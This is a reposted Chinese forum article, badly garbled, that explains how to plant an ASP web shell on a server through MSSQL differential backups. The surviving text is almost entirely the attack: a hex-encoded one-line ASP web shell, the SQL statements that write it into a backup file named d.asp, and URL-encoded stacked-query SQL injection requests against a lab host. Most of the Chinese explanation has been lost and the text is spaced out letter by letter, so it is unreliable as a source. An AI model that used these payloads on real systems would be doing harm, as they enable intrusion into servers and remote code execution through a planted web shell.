[21150] 2020-07-20_Web渗透之mssql差异备份getshell

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2020-07-20_Web渗透之mssql差异备份getshell W e b m s s q l g e t s h e l l L e m o n S e c   2 0 2 0 - 0 7 - 2 0 w e b s h e l l s q l   s e r v e r   d b o s a a s p m s s q l s e r v e r 1 . ( ) 2 . 3 . < % e x e c u t e ( r e q u e s t ( " a " ) ) % > E : w w w r o o t a s p _ s q l i a s p _ t e s t 1 2 b a c k u p   d a t a b a s e     t o   d i s k   =   ' c : d d d . b a k ' ; - - c r e a t e   t a b l e   [ d b o ] . [ d t e s t ]   ( [ c m d ]   [ i m a g e ] ) ; - - i n s e r t   i n t o   d t e s t ( c m d )   v a l u e s ( 0 x 3 C 2 5 6 5 7 8 6 5 6 3 7 5 7 4 6 5 2 8 7 2 6 5 7 1 7 5 6 5 7 3 7 4 2 8 2 2 6 1 2 2 2 9 2 9 2 5 3 E ) ; - - b a c k u p   d a t a b a s e     t o   d i s k = ' d . a s p '   W I T H   D I F F E R E N T I A L , F O R M A T ; - - 0 x 3 C 2 5 6 5 7 8 6 5 6 3 7 5 7 4 6 5 2 8 7 2 6 5 7 1 7 5 6 5 7 3 7 4 2 8 2 2 6 1 2 2 2 9 2 9 2 5 3 E h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; b a c k u p % 2 0 d a t a b a s e % 2 0 a s p _ t e s t % 2 0 t o % 2 0 d i s k % 2 0 = % 2 7 E : w w w r o o t a s p _ s q l i d d d . b a k % 2 7 ; - - h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; c r e a t e % 2 0 t a b l e % 2 0 [ d b o ] . [ d t e s t ] % 2 0 ( [ c m d ] [ i m a g e ] ) ; - - h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; i n s e r t % 2 0 i n t o % 2 0 d t e s t ( c m d ) v a l u e s ( 0 x 3 C 2 5 6 5 7 8 6 5 6 3 7 5 7 4 6 5 2 8 7 2 6 5 7 1 7 5 6 5 7 3 7 4 2 8 2 2 6 1 2 2 2 9 2 9 2 5 3 E ) ; - -
3 h t t p : / / 1 9 2 . 1 6 8 . 5 . 2 1 : 8 1 / i n d e x . a s p ? i d = 1 ; b a c k u p % 2 0 d a t a b a s e % 2 0 a s p _ t e s t % 2 0 t o % 2 0 d i s k = % 2 7 E : w w w r o o t a s p _ s q l i d . a s p % 2 7 % 2 0 W I T H % 2 0 D I F F E R E N T I A L , F O R M A T ; - -
d . a s p   h t t p s : / / w w w . c n b l o g s . c o m / - q i n g - / p / 1 0 6 9 2 8 2 4 . h t m l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则